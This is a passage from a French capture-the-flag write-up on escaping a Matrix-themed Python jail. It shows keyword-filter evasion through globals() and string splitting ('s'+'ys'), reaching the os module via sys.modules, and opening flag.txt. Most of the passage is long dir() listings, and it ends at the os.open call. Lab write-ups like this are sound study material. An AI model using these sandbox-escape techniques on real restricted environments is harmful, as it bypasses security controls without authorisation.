<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">(</span><span class="n">res</span><span class="p">))</span>
<span class="p">[</span><span class="s1">'__add__'</span><span class="p">,</span> <span class="s1">'__class__'</span><span class="p">,</span> <span class="s1">'__contains__'</span><span class="p">,</span> <span class="s1">'__delattr__'</span><span class="p">,</span> <span class="s1">'__dir__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">,</span> <span class="s1">'__eq__'</span><span class="p">,</span> <span class="s1">'__format__'</span><span class="p">,</span> <span class="s1">'__ge__'</span><span class="p">,</span> <span class="s1">'__getattribute__'</span><span class="p">,</span> <span class="s1">'__getitem__'</span><span class="p">,</span> <span class="s1">'__getnewargs__'</span><span class="p">,</span> <span class="s1">'__gt__'</span><span class="p">,</span> <span class="s1">'__hash__'</span><span class="p">,</span> <span class="s1">'__init__'</span><span class="p">,</span> <span class="s1">'__init_subclass__'</span><span class="p">,</span> <span class="s1">'__iter__'</span><span class="p">,</span> <span class="s1">'__le__'</span><span class="p">,</span> <span class="s1">'__len__'</span><span class="p">,</span> <span class="s1">'__lt__'</span><span class="p">,</span> <span class="s1">'__mod__'</span><span class="p">,</span> <span class="s1">'__mul__'</span><span class="p">,</span> <span class="s1">'__ne__'</span><span class="p">,</span> <span class="s1">'__new__'</span><span class="p">,</span> <span class="s1">'__reduce__'</span><span class="p">,</span> <span class="s1">'__reduce_ex__'</span><span class="p">,</span> <span class="s1">'__repr__'</span><span class="p">,</span> <span class="s1">'__rmod__'</span><span class="p">,</span> <span class="s1">'__rmul__'</span><span class="p">,</span> <span class="s1">'__setattr__'</span><span class="p">,</span> <span class="s1">'__sizeof__'</span><span class="p">,</span> <span class="s1">'__str__'</span><span class="p">,</span> <span class="s1">'__subclasshook__'</span><span class="p">,</span> <span class="s1">'capitalize'</span><span class="p">,</span> <span class="s1">'casefold'</span><span class="p">,</span> <span class="s1">'center'</span><span class="p">,</span> <span class="s1">'count'</span><span class="p">,</span> <span class="s1">'encode'</span><span class="p">,</span> <span class="s1">'endswith'</span><span class="p">,</span> <span class="s1">'expandtabs'</span><span class="p">,</span> <span class="s1">'find'</span><span class="p">,</span> <span class="s1">'format'</span><span class="p">,</span> <span class="s1">'format_map'</span><span class="p">,</span> <span class="s1">'index'</span><span class="p">,</span> <span class="s1">'isalnum'</span><span class="p">,</span> <span class="s1">'isalpha'</span><span class="p">,</span> <span class="s1">'isascii'</span><span class="p">,</span> <span class="s1">'isdecimal'</span><span class="p">,</span> <span class="s1">'isdigit'</span><span class="p">,</span> <span class="s1">'isidentifier'</span><span class="p">,</span> <span class="s1">'islower'</span><span class="p">,</span> <span class="s1">'isnumeric'</span><span class="p">,</span> <span class="s1">'isprintable'</span><span class="p">,</span> <span class="s1">'isspace'</span><span class="p">,</span> <span class="s1">'istitle'</span><span class="p">,</span> <span class="s1">'isupper'</span><span class="p">,</span> <span class="s1">'join'</span><span class="p">,</span> <span class="s1">'ljust'</span><span class="p">,</span> <span class="s1">'lower'</span><span class="p">,</span> <span class="s1">'lstrip'</span><span class="p">,</span> <span class="s1">'maketrans'</span><span class="p">,</span> <span class="s1">'partition'</span><span class="p">,</span> <span class="s1">'replace'</span><span class="p">,</span> <span class="s1">'rfind'</span><span class="p">,</span> <span class="s1">'rindex'</span><span class="p">,</span> <span class="s1">'rjust'</span><span class="p">,</span> <span class="s1">'rpartition'</span><span class="p">,</span> <span class="s1">'rsplit'</span><span class="p">,</span> <span class="s1">'rstrip'</span><span class="p">,</span> <span class="s1">'split'</span><span class="p">,</span> <span class="s1">'splitlines'</span><span class="p">,</span> <span class="s1">'startswith'</span><span class="p">,</span> <span class="s1">'strip'</span><span class="p">,</span> <span class="s1">'swapcase'</span><span class="p">,</span> <span class="s1">'title'</span><span class="p">,</span> <span class="s1">'translate'</span><span class="p">,</span> <span class="s1">'upper'</span><span class="p">,</span> <span class="s1">'zfill'</span><span class="p">]</span>
</code></pre></div>
<p>On a donc accès à tout ces éléments. Notre objectif étant d'afficher le contenu d'un fichier (<code>flag.txt</code>). Il nous faudrait réussir à avoir un accès au module python <code>os</code> et sa partie <code>file</code> (<code>open</code> et <code>read</code>).
Il nous est impossible d'utiliser directement <code>import</code> car Trinity nous renvoie son message. On va donc devoir ruser et passer par <code>sys</code> que nous avons via <code>globals()</code>.</p>
<div class="highlight"><pre><span></span><code><span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="n">a</span><span class="o">=</span><span class="nb">globals</span><span class="p">()[</span><span class="s2">"sys"</span><span class="p">]</span>
<span class="p">(</span><span class="err">⌐■</span><span class="n">_</span><span class="err">■</span><span class="p">)</span> <span class="o"><</span><span class="n">Trinity</span><span class="o">></span><span class="p">:</span> <span class="n">No</span> <span class="n">one</span> <span class="n">has</span> <span class="n">ever</span> <span class="n">done</span> <span class="n">anything</span> <span class="n">like</span> <span class="n">this</span>
</code></pre></div>
<p>Ok, Trinity nous a à l'oeil. Pas de problème, on coupe la chaîne en deux et on l'ajoute :</p>
<div class="highlight"><pre><span></span><code><span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="n">a</span><span class="o">=</span><span class="nb">globals</span><span class="p">()[</span><span class="s2">"s"</span><span class="o">+</span><span class="s2">"ys"</span><span class="p">]</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">(</span><span class="n">a</span><span class="p">))</span>
<span class="p">[</span><span class="s1">'__breakpointhook__'</span><span class="p">,</span> <span class="s1">'__displayhook__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">,</span> <span class="s1">'__excepthook__'</span><span class="p">,</span> <span class="s1">'__interactivehook__'</span><span class="p">,</span> <span class="s1">'__loader__'</span><span class="p">,</span> <span class="s1">'__name__'</span><span class="p">,</span> <span class="s1">'__package__'</span><span class="p">,</span> <span class="s1">'__spec__'</span><span class="p">,</span> <span class="s1">'__stderr__'</span><span class="p">,</span> <span class="s1">'__stdin__'</span><span class="p">,</span> <span class="s1">'__stdout__'</span><span class="p">,</span> <span class="s1">'_clear_type_cache'</span><span class="p">,</span> <span class="s1">'_current_frames'</span><span class="p">,</span> <span class="s1">'_debugmallocstats'</span><span class="p">,</span> <span class="s1">'_framework'</span><span class="p">,</span> <span class="s1">'_getframe'</span><span class="p">,</span> <span class="s1">'_git'</span><span class="p">,</span> <span class="s1">'_home'</span><span class="p">,</span> <span class="s1">'_xoptions'</span><span class="p">,</span> <span class="s1">'abiflags'</span><span class="p">,</span> <span class="s1">'api_version'</span><span class="p">,</span> <span class="s1">'argv'</span><span class="p">,</span> <span class="s1">'base_exec_prefix'</span><span class="p">,</span> <span class="s1">'base_prefix'</span><span class="p">,</span> <span class="s1">'breakpointhook'</span><span class="p">,</span> <span class="s1">'builtin_module_names'</span><span class="p">,</span> <span class="s1">'byteorder'</span><span class="p">,</span> <span class="s1">'call_tracing'</span><span class="p">,</span> <span class="s1">'callstats'</span><span class="p">,</span> <span class="s1">'copyright'</span><span class="p">,</span> <span class="s1">'displayhook'</span><span class="p">,</span> <span class="s1">'dont_write_bytecode'</span><span class="p">,</span> <span class="s1">'exc_info'</span><span class="p">,</span> <span class="s1">'excepthook'</span><span class="p">,</span> <span class="s1">'exec_prefix'</span><span class="p">,</span> <span class="s1">'executable'</span><span class="p">,</span> <span class="s1">'exit'</span><span class="p">,</span> <span class="s1">'flags'</span><span class="p">,</span> <span class="s1">'float_info'</span><span class="p">,</span> <span class="s1">'float_repr_style'</span><span class="p">,</span> <span class="s1">'get_asyncgen_hooks'</span><span class="p">,</span> <span class="s1">'get_coroutine_origin_tracking_depth'</span><span class="p">,</span> <span class="s1">'get_coroutine_wrapper'</span><span class="p">,</span> <span class="s1">'getallocatedblocks'</span><span class="p">,</span> <span class="s1">'getcheckinterval'</span><span class="p">,</span> <span class="s1">'getdefaultencoding'</span><span class="p">,</span> <span class="s1">'getdlopenflags'</span><span class="p">,</span> <span class="s1">'getfilesystemencodeerrors'</span><span class="p">,</span> <span class="s1">'getfilesystemencoding'</span><span class="p">,</span> <span class="s1">'getprofile'</span><span class="p">,</span> <span class="s1">'getrecursionlimit'</span><span class="p">,</span> <span class="s1">'getrefcount'</span><span class="p">,</span> <span class="s1">'getsizeof'</span><span class="p">,</span> <span class="s1">'getswitchinterval'</span><span class="p">,</span> <span class="s1">'gettrace'</span><span class="p">,</span> <span class="s1">'hash_info'</span><span class="p">,</span> <span class="s1">'hexversion'</span><span class="p">,</span> <span class="s1">'implementation'</span><span class="p">,</span> <span class="s1">'int_info'</span><span class="p">,</span> <span class="s1">'intern'</span><span class="p">,</span> <span class="s1">'is_finalizing'</span><span class="p">,</span> <span class="s1">'maxsize'</span><span class="p">,</span> <span class="s1">'maxunicode'</span><span class="p">,</span> <span class="s1">'meta_path'</span><span class="p">,</span> <span class="s1">'modules'</span><span class="p">,</span> <span class="s1">'path'</span><span class="p">,</span> <span class="s1">'path_hooks'</span><span class="p">,</span> <span class="s1">'path_importer_cache'</span><span class="p">,</span> <span class="s1">'platform'</span><span class="p">,</span> <span class="s1">'prefix'</span><span class="p">,</span> <span class="s1">'set_asyncgen_hooks'</span><span class="p">,</span> <span class="s1">'set_coroutine_origin_tracking_depth'</span><span class="p">,</span> <span class="s1">'set_coroutine_wrapper'</span><span class="p">,</span> <span class="s1">'setcheckinterval'</span><span class="p">,</span> <span class="s1">'setdlopenflags'</span><span class="p">,</span> <span class="s1">'setprofile'</span><span class="p">,</span> <span class="s1">'setrecursionlimit'</span><span class="p">,</span> <span class="s1">'setswitchinterval'</span><span class="p">,</span> <span class="s1">'settrace'</span><span class="p">,</span> <span class="s1">'stderr'</span><span class="p">,</span> <span class="s1">'stdin'</span><span class="p">,</span> <span class="s1">'stdout'</span><span class="p">,</span> <span class="s1">'thread_info'</span><span class="p">,</span> <span class="s1">'version'</span><span class="p">,</span> <span class="s1">'version_info'</span><span class="p">,</span> <span class="s1">'warnoptions'</span><span class="p">]</span>
</code></pre></div>
<p>On a bien notre <code>modules</code> avec <code>os</code> dedans. On peut donc avoir les fonctions de gestion de fichiers :D.</p>
<div class="highlight"><pre><span></span><code><span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]))</span>
<span class="p">[</span><span class="s1">'CLD_CONTINUED'</span><span class="p">,</span> <span class="s1">'CLD_DUMPED'</span><span class="p">,</span> <span class="s1">'CLD_EXITED'</span><span class="p">,</span> <span class="s1">'CLD_TRAPPED'</span><span class="p">,</span> <span class="s1">'DirEntry'</span><span class="p">,</span> <span class="s1">'EX_CANTCREAT'</span><span class="p">,</span> <span class="s1">'EX_CONFIG'</span><span class="p">,</span> <span class="s1">'EX_DATAERR'</span><span class="p">,</span> <span class="s1">'EX_IOERR'</span><span class="p">,</span> <span class="s1">'EX_NOHOST'</span><span class="p">,</span> <span class="s1">'EX_NOINPUT'</span><span class="p">,</span> <span class="s1">'EX_NOPERM'</span><span class="p">,</span> <span class="s1">'EX_NOUSER'</span><span class="p">,</span> <span class="s1">'EX_OK'</span><span class="p">,</span> <span class="s1">'EX_OSERR'</span><span class="p">,</span> <span class="s1">'EX_OSFILE'</span><span class="p">,</span> <span class="s1">'EX_PROTOCOL'</span><span class="p">,</span> <span class="s1">'EX_SOFTWARE'</span><span class="p">,</span> <span class="s1">'EX_TEMPFAIL'</span><span class="p">,</span> <span class="s1">'EX_UNAVAILABLE'</span><span class="p">,</span> <span class="s1">'EX_USAGE'</span><span class="p">,</span> <span class="s1">'F_LOCK'</span><span class="p">,</span> <span class="s1">'F_OK'</span><span class="p">,</span> <span class="s1">'F_TEST'</span><span class="p">,</span> <span class="s1">'F_TLOCK'</span><span class="p">,</span> <span class="s1">'F_ULOCK'</span><span class="p">,</span> <span class="s1">'GRND_NONBLOCK'</span><span class="p">,</span> <span class="s1">'GRND_RANDOM'</span><span class="p">,</span> <span class="s1">'MutableMapping'</span><span class="p">,</span> <span class="s1">'NGROUPS_MAX'</span><span class="p">,</span> <span class="s1">'O_ACCMODE'</span><span class="p">,</span> <span class="s1">'O_APPEND'</span><span class="p">,</span> <span class="s1">'O_ASYNC'</span><span class="p">,</span> <span class="s1">'O_CLOEXEC'</span><span class="p">,</span> <span class="s1">'O_CREAT'</span><span class="p">,</span> <span class="s1">'O_DIRECT'</span><span class="p">,</span> <span class="s1">'O_DIRECTORY'</span><span class="p">,</span> <span class="s1">'O_DSYNC'</span><span class="p">,</span> <span class="s1">'O_EXCL'</span><span class="p">,</span> <span class="s1">'O_EXEC'</span><span class="p">,</span> <span class="s1">'O_LARGEFILE'</span><span class="p">,</span> <span class="s1">'O_NDELAY'</span><span class="p">,</span> <span class="s1">'O_NOATIME'</span><span class="p">,</span> <span class="s1">'O_NOCTTY'</span><span class="p">,</span> <span class="s1">'O_NOFOLLOW'</span><span class="p">,</span> <span class="s1">'O_NONBLOCK'</span><span class="p">,</span> <span class="s1">'O_PATH'</span><span class="p">,</span> <span class="s1">'O_RDONLY'</span><span class="p">,</span> <span class="s1">'O_RDWR'</span><span class="p">,</span> <span class="s1">'O_RSYNC'</span><span class="p">,</span> <span class="s1">'O_SEARCH'</span><span class="p">,</span> <span class="s1">'O_SYNC'</span><span class="p">,</span> <span class="s1">'O_TMPFILE'</span><span class="p">,</span> <span class="s1">'O_TRUNC'</span><span class="p">,</span> <span class="s1">'O_WRONLY'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_DONTNEED'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_NOREUSE'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_NORMAL'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_RANDOM'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_SEQUENTIAL'</span><span class="p">,</span> <span class="s1">'POSIX_FADV_WILLNEED'</span><span class="p">,</span> <span class="s1">'PRIO_PGRP'</span><span class="p">,</span> <span class="s1">'PRIO_PROCESS'</span><span class="p">,</span> <span class="s1">'PRIO_USER'</span><span class="p">,</span> <span class="s1">'P_ALL'</span><span class="p">,</span> <span class="s1">'P_NOWAIT'</span><span class="p">,</span> <span class="s1">'P_NOWAITO'</span><span class="p">,</span> <span class="s1">'P_PGID'</span><span class="p">,</span> <span class="s1">'P_PID'</span><span class="p">,</span> <span class="s1">'P_WAIT'</span><span class="p">,</span> <span class="s1">'PathLike'</span><span class="p">,</span> <span class="s1">'RTLD_GLOBAL'</span><span class="p">,</span> <span class="s1">'RTLD_LAZY'</span><span class="p">,</span> <span class="s1">'RTLD_LOCAL'</span><span class="p">,</span> <span class="s1">'RTLD_NODELETE'</span><span class="p">,</span> <span class="s1">'RTLD_NOLOAD'</span><span class="p">,</span> <span class="s1">'RTLD_NOW'</span><span class="p">,</span> <span class="s1">'R_OK'</span><span class="p">,</span> <span class="s1">'SCHED_BATCH'</span><span class="p">,</span> <span class="s1">'SCHED_FIFO'</span><span class="p">,</span> <span class="s1">'SCHED_IDLE'</span><span class="p">,</span> <span class="s1">'SCHED_OTHER'</span><span class="p">,</span> <span class="s1">'SCHED_RESET_ON_FORK'</span><span class="p">,</span> <span class="s1">'SCHED_RR'</span><span class="p">,</span> <span class="s1">'SEEK_CUR'</span><span class="p">,</span> <span class="s1">'SEEK_END'</span><span class="p">,</span> <span class="s1">'SEEK_SET'</span><span class="p">,</span> <span class="s1">'ST_APPEND'</span><span class="p">,</span> <span class="s1">'ST_MANDLOCK'</span><span class="p">,</span> <span class="s1">'ST_NOATIME'</span><span class="p">,</span> <span class="s1">'ST_NODEV'</span><span class="p">,</span> <span class="s1">'ST_NODIRATIME'</span><span class="p">,</span> <span class="s1">'ST_NOEXEC'</span><span class="p">,</span> <span class="s1">'ST_NOSUID'</span><span class="p">,</span> <span class="s1">'ST_RDONLY'</span><span class="p">,</span> <span class="s1">'ST_RELATIME'</span><span class="p">,</span> <span class="s1">'ST_SYNCHRONOUS'</span><span class="p">,</span> <span class="s1">'ST_WRITE'</span><span class="p">,</span> <span class="s1">'TMP_MAX'</span><span class="p">,</span> <span class="s1">'WCONTINUED'</span><span class="p">,</span> <span class="s1">'WCOREDUMP'</span><span class="p">,</span> <span class="s1">'WEXITED'</span><span class="p">,</span> <span class="s1">'WEXITSTATUS'</span><span class="p">,</span> <span class="s1">'WIFCONTINUED'</span><span class="p">,</span> <span class="s1">'WIFEXITED'</span><span class="p">,</span> <span class="s1">'WIFSIGNALED'</span><span class="p">,</span> <span class="s1">'WIFSTOPPED'</span><span class="p">,</span> <span class="s1">'WNOHANG'</span><span class="p">,</span> <span class="s1">'WNOWAIT'</span><span class="p">,</span> <span class="s1">'WSTOPPED'</span><span class="p">,</span> <span class="s1">'WSTOPSIG'</span><span class="p">,</span> <span class="s1">'WTERMSIG'</span><span class="p">,</span> <span class="s1">'WUNTRACED'</span><span class="p">,</span> <span class="s1">'W_OK'</span><span class="p">,</span> <span class="s1">'XATTR_CREATE'</span><span class="p">,</span> <span class="s1">'XATTR_REPLACE'</span><span class="p">,</span> <span class="s1">'XATTR_SIZE_MAX'</span><span class="p">,</span> <span class="s1">'X_OK'</span><span class="p">,</span> <span class="s1">'_Environ'</span><span class="p">,</span> <span class="s1">'__all__'</span><span class="p">,</span> <span class="s1">'__builtins__'</span><span class="p">,</span> <span class="s1">'__cached__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">,</span> <span class="s1">'__file__'</span><span class="p">,</span> <span class="s1">'__loader__'</span><span class="p">,</span> <span class="s1">'__name__'</span><span class="p">,</span> <span class="s1">'__package__'</span><span class="p">,</span> <span class="s1">'__spec__'</span><span class="p">,</span> <span class="s1">'_execvpe'</span><span class="p">,</span> <span class="s1">'_exists'</span><span class="p">,</span> <span class="s1">'_exit'</span><span class="p">,</span> <span class="s1">'_fspath'</span><span class="p">,</span> <span class="s1">'_fwalk'</span><span class="p">,</span> <span class="s1">'_get_exports_list'</span><span class="p">,</span> <span class="s1">'_putenv'</span><span class="p">,</span> <span class="s1">'_spawnvef'</span><span class="p">,</span> <span class="s1">'_unsetenv'</span><span class="p">,</span> <span class="s1">'_wrap_close'</span><span class="p">,</span> <span class="s1">'abc'</span><span class="p">,</span> <span class="s1">'abort'</span><span class="p">,</span> <span class="s1">'access'</span><span class="p">,</span> <span class="s1">'altsep'</span><span class="p">,</span> <span class="s1">'chdir'</span><span class="p">,</span> <span class="s1">'chmod'</span><span class="p">,</span> <span class="s1">'chown'</span><span class="p">,</span> <span class="s1">'chroot'</span><span class="p">,</span> <span class="s1">'close'</span><span class="p">,</span> <span class="s1">'closerange'</span><span class="p">,</span> <span class="s1">'confstr'</span><span class="p">,</span> <span class="s1">'confstr_names'</span><span class="p">,</span> <span class="s1">'cpu_count'</span><span class="p">,</span> <span class="s1">'ctermid'</span><span class="p">,</span> <span class="s1">'curdir'</span><span class="p">,</span> <span class="s1">'defpath'</span><span class="p">,</span> <span class="s1">'device_encoding'</span><span class="p">,</span> <span class="s1">'devnull'</span><span class="p">,</span> <span class="s1">'dup'</span><span class="p">,</span> <span class="s1">'dup2'</span><span class="p">,</span> <span class="s1">'environ'</span><span class="p">,</span> <span class="s1">'environb'</span><span class="p">,</span> <span class="s1">'error'</span><span class="p">,</span> <span class="s1">'execl'</span><span class="p">,</span> <span class="s1">'execle'</span><span class="p">,</span> <span class="s1">'execlp'</span><span class="p">,</span> <span class="s1">'execlpe'</span><span class="p">,</span> <span class="s1">'execv'</span><span class="p">,</span> <span class="s1">'execve'</span><span class="p">,</span> <span class="s1">'execvp'</span><span class="p">,</span> <span class="s1">'execvpe'</span><span class="p">,</span> <span class="s1">'extsep'</span><span class="p">,</span> <span class="s1">'fchdir'</span><span class="p">,</span> <span class="s1">'fchmod'</span><span class="p">,</span> <span class="s1">'fchown'</span><span class="p">,</span> <span class="s1">'fdatasync'</span><span class="p">,</span> <span class="s1">'fdopen'</span><span class="p">,</span> <span class="s1">'fork'</span><span class="p">,</span> <span class="s1">'forkpty'</span><span class="p">,</span> <span class="s1">'fpathconf'</span><span class="p">,</span> <span class="s1">'fsdecode'</span><span class="p">,</span> <span class="s1">'fsencode'</span><span class="p">,</span> <span class="s1">'fspath'</span><span class="p">,</span> <span class="s1">'fstat'</span><span class="p">,</span> <span class="s1">'fstatvfs'</span><span class="p">,</span> <span class="s1">'fsync'</span><span class="p">,</span> <span class="s1">'ftruncate'</span><span class="p">,</span> <span class="s1">'fwalk'</span><span class="p">,</span> <span class="s1">'get_blocking'</span><span class="p">,</span> <span class="s1">'get_exec_path'</span><span class="p">,</span> <span class="s1">'get_inheritable'</span><span class="p">,</span> <span class="s1">'get_terminal_size'</span><span class="p">,</span> <span class="s1">'getcwd'</span><span class="p">,</span> <span class="s1">'getcwdb'</span><span class="p">,</span> <span class="s1">'getegid'</span><span class="p">,</span> <span class="s1">'getenv'</span><span class="p">,</span> <span class="s1">'getenvb'</span><span class="p">,</span> <span class="s1">'geteuid'</span><span class="p">,</span> <span class="s1">'getgid'</span><span class="p">,</span> <span class="s1">'getgrouplist'</span><span class="p">,</span> <span class="s1">'getgroups'</span><span class="p">,</span> <span class="s1">'getloadavg'</span><span class="p">,</span> <span class="s1">'getlogin'</span><span class="p">,</span> <span class="s1">'getpgid'</span><span class="p">,</span> <span class="s1">'getpgrp'</span><span class="p">,</span> <span class="s1">'getpid'</span><span class="p">,</span> <span class="s1">'getppid'</span><span class="p">,</span> <span class="s1">'getpriority'</span><span class="p">,</span> <span class="s1">'getrandom'</span><span class="p">,</span> <span class="s1">'getresgid'</span><span class="p">,</span> <span class="s1">'getresuid'</span><span class="p">,</span> <span class="s1">'getsid'</span><span class="p">,</span> <span class="s1">'getuid'</span><span class="p">,</span> <span class="s1">'getxattr'</span><span class="p">,</span> <span class="s1">'initgroups'</span><span class="p">,</span> <span class="s1">'isatty'</span><span class="p">,</span> <span class="s1">'kill'</span><span class="p">,</span> <span class="s1">'killpg'</span><span class="p">,</span> <span class="s1">'lchown'</span><span class="p">,</span> <span class="s1">'linesep'</span><span class="p">,</span> <span class="s1">'link'</span><span class="p">,</span> <span class="s1">'listdir'</span><span class="p">,</span> <span class="s1">'listxattr'</span><span class="p">,</span> <span class="s1">'lockf'</span><span class="p">,</span> <span class="s1">'lseek'</span><span class="p">,</span> <span class="s1">'lstat'</span><span class="p">,</span> <span class="s1">'major'</span><span class="p">,</span> <span class="s1">'makedev'</span><span class="p">,</span> <span class="s1">'makedirs'</span><span class="p">,</span> <span class="s1">'minor'</span><span class="p">,</span> <span class="s1">'mkdir'</span><span class="p">,</span> <span class="s1">'mkfifo'</span><span class="p">,</span> <span class="s1">'mknod'</span><span class="p">,</span> <span class="s1">'name'</span><span class="p">,</span> <span class="s1">'nice'</span><span class="p">,</span> <span class="s1">'open'</span><span class="p">,</span> <span class="s1">'openpty'</span><span class="p">,</span> <span class="s1">'pardir'</span><span class="p">,</span> <span class="s1">'path'</span><span class="p">,</span> <span class="s1">'pathconf'</span><span class="p">,</span> <span class="s1">'pathconf_names'</span><span class="p">,</span> <span class="s1">'pathsep'</span><span class="p">,</span> <span class="s1">'pipe'</span><span class="p">,</span> <span class="s1">'pipe2'</span><span class="p">,</span> <span class="s1">'popen'</span><span class="p">,</span> <span class="s1">'posix_fadvise'</span><span class="p">,</span> <span class="s1">'posix_fallocate'</span><span class="p">,</span> <span class="s1">'pread'</span><span class="p">,</span> <span class="s1">'preadv'</span><span class="p">,</span> <span class="s1">'putenv'</span><span class="p">,</span> <span class="s1">'pwrite'</span><span class="p">,</span> <span class="s1">'pwritev'</span><span class="p">,</span> <span class="s1">'read'</span><span class="p">,</span> <span class="s1">'readlink'</span><span class="p">,</span> <span class="s1">'readv'</span><span class="p">,</span> <span class="s1">'register_at_fork'</span><span class="p">,</span> <span class="s1">'remove'</span><span class="p">,</span> <span class="s1">'removedirs'</span><span class="p">,</span> <span class="s1">'removexattr'</span><span class="p">,</span> <span class="s1">'rename'</span><span class="p">,</span> <span class="s1">'renames'</span><span class="p">,</span> <span class="s1">'replace'</span><span class="p">,</span> <span class="s1">'rmdir'</span><span class="p">,</span> <span class="s1">'scandir'</span><span class="p">,</span> <span class="s1">'sched_get_priority_max'</span><span class="p">,</span> <span class="s1">'sched_get_priority_min'</span><span class="p">,</span> <span class="s1">'sched_getaffinity'</span><span class="p">,</span> <span class="s1">'sched_getparam'</span><span class="p">,</span> <span class="s1">'sched_getscheduler'</span><span class="p">,</span> <span class="s1">'sched_param'</span><span class="p">,</span> <span class="s1">'sched_rr_get_interval'</span><span class="p">,</span> <span class="s1">'sched_setaffinity'</span><span class="p">,</span> <span class="s1">'sched_setparam'</span><span class="p">,</span> <span class="s1">'sched_setscheduler'</span><span class="p">,</span> <span class="s1">'sched_yield'</span><span class="p">,</span> <span class="s1">'sendfile'</span><span class="p">,</span> <span class="s1">'sep'</span><span class="p">,</span> <span class="s1">'set_blocking'</span><span class="p">,</span> <span class="s1">'set_inheritable'</span><span class="p">,</span> <span class="s1">'setegid'</span><span class="p">,</span> <span class="s1">'seteuid'</span><span class="p">,</span> <span class="s1">'setgid'</span><span class="p">,</span> <span class="s1">'setgroups'</span><span class="p">,</span> <span class="s1">'setpgid'</span><span class="p">,</span> <span class="s1">'setpgrp'</span><span class="p">,</span> <span class="s1">'setpriority'</span><span class="p">,</span> <span class="s1">'setregid'</span><span class="p">,</span> <span class="s1">'setresgid'</span><span class="p">,</span> <span class="s1">'setresuid'</span><span class="p">,</span> <span class="s1">'setreuid'</span><span class="p">,</span> <span class="s1">'setsid'</span><span class="p">,</span> <span class="s1">'setuid'</span><span class="p">,</span> <span class="s1">'setxattr'</span><span class="p">,</span> <span class="s1">'spawnl'</span><span class="p">,</span> <span class="s1">'spawnle'</span><span class="p">,</span> <span class="s1">'spawnlp'</span><span class="p">,</span> <span class="s1">'spawnlpe'</span><span class="p">,</span> <span class="s1">'spawnv'</span><span class="p">,</span> <span class="s1">'spawnve'</span><span class="p">,</span> <span class="s1">'spawnvp'</span><span class="p">,</span> <span class="s1">'spawnvpe'</span><span class="p">,</span> <span class="s1">'st'</span><span class="p">,</span> <span class="s1">'stat'</span><span class="p">,</span> <span class="s1">'stat_result'</span><span class="p">,</span> <span class="s1">'statvfs'</span><span class="p">,</span> <span class="s1">'statvfs_result'</span><span class="p">,</span> <span class="s1">'strerror'</span><span class="p">,</span> <span class="s1">'supports_bytes_environ'</span><span class="p">,</span> <span class="s1">'supports_dir_fd'</span><span class="p">,</span> <span class="s1">'supports_effective_ids'</span><span class="p">,</span> <span class="s1">'supports_fd'</span><span class="p">,</span> <span class="s1">'supports_follow_symlinks'</span><span class="p">,</span> <span class="s1">'symlink'</span><span class="p">,</span> <span class="s1">'sync'</span><span class="p">,</span> <span class="s1">'sys'</span><span class="p">,</span> <span class="s1">'sysconf'</span><span class="p">,</span> <span class="s1">'sysconf_names'</span><span class="p">,</span> <span class="s1">'system'</span><span class="p">,</span> <span class="s1">'tcgetpgrp'</span><span class="p">,</span> <span class="s1">'tcsetpgrp'</span><span class="p">,</span> <span class="s1">'terminal_size'</span><span class="p">,</span> <span class="s1">'times'</span><span class="p">,</span> <span class="s1">'times_result'</span><span class="p">,</span> <span class="s1">'truncate'</span><span class="p">,</span> <span class="s1">'ttyname'</span><span class="p">,</span> <span class="s1">'umask'</span><span class="p">,</span> <span class="s1">'uname'</span><span class="p">,</span> <span class="s1">'uname_result'</span><span class="p">,</span> <span class="s1">'unlink'</span><span class="p">,</span> <span class="s1">'unsetenv'</span><span class="p">,</span> <span class="s1">'urandom'</span><span class="p">,</span> <span class="s1">'utime'</span><span class="p">,</span> <span class="s1">'wait'</span><span class="p">,</span> <span class="s1">'wait3'</span><span class="p">,</span> <span class="s1">'wait4'</span><span class="p">,</span> <span class="s1">'waitid'</span><span class="p">,</span> <span class="s1">'waitid_result'</span><span class="p">,</span> <span class="s1">'waitpid'</span><span class="p">,</span> <span class="s1">'walk'</span><span class="p">,</span> <span class="s1">'write'</span><span class="p">,</span> <span class="s1">'writev'</span><span class="p">]</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">getcwd</span><span class="p">())</span>
<span class="o">/</span><span class="n">app</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">sys</span><span class="p">(</span><span class="s2">"ls"</span><span class="p">))</span>
<span class="p">(</span><span class="err">⌐■</span><span class="n">_</span><span class="err">■</span><span class="p">)</span> <span class="o"><</span><span class="n">Trinity</span><span class="o">></span><span class="p">:</span> <span class="n">No</span> <span class="n">one</span> <span class="n">has</span> <span class="n">ever</span> <span class="n">done</span> <span class="n">anything</span> <span class="n">like</span> <span class="n">this</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="n">file</span> <span class="o">=</span> <span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="s2">"flag.txt"</span><span class="p">,</span><span class="mi">0</span><span class="p">)</span>
